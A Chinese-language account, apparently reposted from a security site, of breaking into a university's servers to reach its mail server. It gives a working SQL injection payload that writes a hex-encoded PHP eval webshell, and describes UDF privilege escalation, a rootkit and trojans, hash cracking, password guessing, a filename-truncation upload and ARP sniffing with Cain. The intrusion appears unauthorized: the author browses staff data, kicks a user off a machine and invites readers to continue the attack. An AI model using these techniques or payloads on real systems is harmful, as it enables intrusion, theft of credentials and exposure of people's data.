渗透某大学邮件服务器

一、踩点了
目标mail.xxx.edu.cn,做了CDN,真实IP暂时不知。linux的系统,开了22,直接搞估计是没戏的,只有慢慢从旁渗透了。
第一步,当然是google了,site:xxx.edu.cn inurl:.asp?,然后丢到管中窥豹里面扫了几下,发现几个注点,顺便进后台备份搞下一个SHELL。


二、提权未果,继续找入口(php注入)
SHELL权限限得很死,该禁用的都禁用了,尝试任何方法提权未果,决定放弃这条路。
继续google site:xxx.edu.cn inurl:.aspx? inurl:.php? inurl:.jsp?
等方法,结果在发现一个PHP的注点。
简单测试一下大小写为WINDOWS,加个单引号,发现居然GPC为OFF。这里让人信心大增,拿下这台服务器似乎不远了。

手工探测了下,7个字段,ROOT权限(这下他基本跑不掉了)

这下只要找到目标绝对路径SHELL就到手了哈,开始想load_file WAMP的配置文件的,后来偷了个懒,还是利用咱们的google大叔,呵呵,路径就出来了。
Warning www Site:xxx.edu.cn

最终经过一翻尝试,目标绝对路径为E:wwwjob
直接通过注点导出SHELL
And 1=2 union select 1,2, 0x3C3F70687020406576616C28245F504F53545B2762616F62616F275D293B3F3E,4,5,6,7 from mysql.user into outfile ‘e:\www\www.91ri.org\1.php’—
然后上马,读MYSQL数据配置文件,拿ROOT密码。
由于目标是5.1,所以新建PLUGIN目录导UDF提权成功。



三、内网渗透
经过分析,job这台服务器的IP与目标mail的服务器IP相隔比较远,无法直接进行ARP等攻击。于是破解了本机三个管理员HASH。
并上传asprootkit.asp到www2.xxx.edu.cn的服务器,利用wexxx这个管理员登录,提权成功,为了方便控制,种植上了木马。


在内网破解密码、渗透等一翻XXOO之后,终于找到一台可以从外网直接登入内网的服务器202.xxx.xxx.18,并找到内网对应的MAIL服务器192.168.0.29


同时,还通过密码组合猜测的方式登录了另外一台MAIL的SSH

但目标的密码没有猜出来。
四、ARP未果,渗透员工数据库。
由于是内网IP,并不是公网IP,而且内网没有网关,所以ARP是没有用的,必须还要找到与目标MAIL服务器使用同一个出口网关的服务器才可ARP。于是决定暂时放弃这条路,想通过渗透目标员工数据库找到敏感信息。
通过前期收集的信息对,202.xxx.xxx.1-255进行扫描,发现一个202.xxx.xxx.72上有一个员工管理系统,

通过测试帐号登录后台,上传照片的地方利用字符截断获取WEBSHELL。

进入数据库翻看了几十分钟,感觉太烦,没继续往下看。休息,等第二天再来。
五、直接ARP了。
经过分析,认为从数据库中可能拿不到太有价值的东东,干脆直接ARP了吧,于是又一番XXOO,终于搞到一台与目标MAIL使用同一出口的服务器,直接上CAIN,成功ARP,等RP看密码了。由于比较忙,渗透到此了。


如果娃娃想继续搞的话,可以多收集些信息,目标的SSH多半在某台管理员机子上面。
202.xxx.xxx.138 这台机子上存在密码的可能比较大,不过是台win7的个人机,昨天登录把别人踢下来。呵呵。

本文摘自zczpc2000由网络安全攻防研究室(www.91ri.org) 信息安全小组收集整理.转载本文请著名原文地址及版权信息。